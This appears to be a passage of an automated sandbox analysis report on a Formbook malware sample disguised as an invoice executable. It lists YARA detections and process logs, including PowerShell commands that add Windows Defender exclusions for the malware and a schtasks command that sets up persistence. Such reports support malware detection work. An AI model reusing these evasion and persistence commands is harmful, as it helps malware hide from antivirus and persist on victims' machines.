          Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: HAWB AND INV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: qxnptkmQbHB.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@16/19@9/4
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile created: C:\Users\user\AppData\Roaming\qxnptkmQbHB.exeJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6948:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4756:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7080:120:WilError_01
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile created: C:\Users\user\AppData\Local\Temp\tmp9D41.tmpJump to behavior
          Source: HAWB AND INV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HAWB AND INV.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: HAWB AND INV.exeReversingLabs: Detection: 21%
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile read: C:\Users\user\Desktop\HAWB AND INV.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\HAWB AND INV.exe 'C:\Users\user\Desktop\HAWB AND INV.exe'
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
          Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Users\user\Desktop\HAWB AND INV.exe C:\Users\user\Desktop\HAWB AND INV.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HAWB AND INV.exe'Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\qxnptkmQbHB.exe'Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Users\user\Desktop\HAWB AND INV.exe C:\Users\user\Desktop\HAWB AND INV.exeJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: HAWB AND INV.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: HAWB AND INV.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: ipconfig.pdb source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: HAWB AND INV.exe, 0000000A.00000002.485361222.0000000003100000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: HAWB AND INV.exe, 0000000A.00000002.479054770.00000000012CF000.00000040.00000001.sdmp, ipconfig.exe, 00000017.00000003.473141653.00000000008F0000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdb source: HAWB AND INV.exe, ipconfig.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.426929861.000000000DC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_009794E5 push cs; iretd 0_2_009794E6
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05838AB8 pushad ; ret 0_2_05838ABC
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05838AC2 pushad ; ret 0_2_05838AC3
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B3B5 push eax; ret 10_2_0041B408
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B46C push eax; ret 10_2_0041B472
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B402 push eax; ret 10_2_0041B408
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B40B push eax; ret 10_2_0041B472
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B584 push edi; ret 10_2_0041BBBA
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00415611 pushfd ; iretd 10_2_00415612
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00415EB3 push edx; retf 10_2_00415ECE
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00415FB3 push esi; ret 10_2_00415FBA
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_007594E5 push cs; iretd 10_2_007594E6
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0122D0D1 push ecx; ret 10_2_0122D0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B2D0D1 push ecx; ret 23_2_02B2D0E4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B3B5 push eax; ret 23_2_0012B408
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B402 push eax; ret 23_2_0012B408
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B40B push eax; ret 23_2_0012B472
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B46C push eax; ret 23_2_0012B472
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B584 push edi; ret 23_2_0012BBBA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00125611 pushfd ; iretd 23_2_00125612
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00125EB3 push edx; retf 23_2_00125ECE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00125FB3 push esi; ret 23_2_00125FBA
          Source: initial sampleStatic PE information: section name: .text entropy: 7.93407065965
          Source: initial sampleStatic PE information: section name: .text entropy: 7.93407065965

          Persistence and Installation Behavior:

          barindex
          Uses ipconfig to lookup or modify the Windows network settingsShow sources
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
          Source: C:\Users\user\Desktop\HAWB AND INV.exeFile created: C:\Users\user\AppData\Roaming\qxnptkmQbHB.exeJump to dropped file

          Boot Survival:

          barindex
          Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\qxnptkmQbHB' /XML 'C:\Users\user\AppData\Local\Temp\tmp9D41.tmp'
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\HAWB AND INV.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
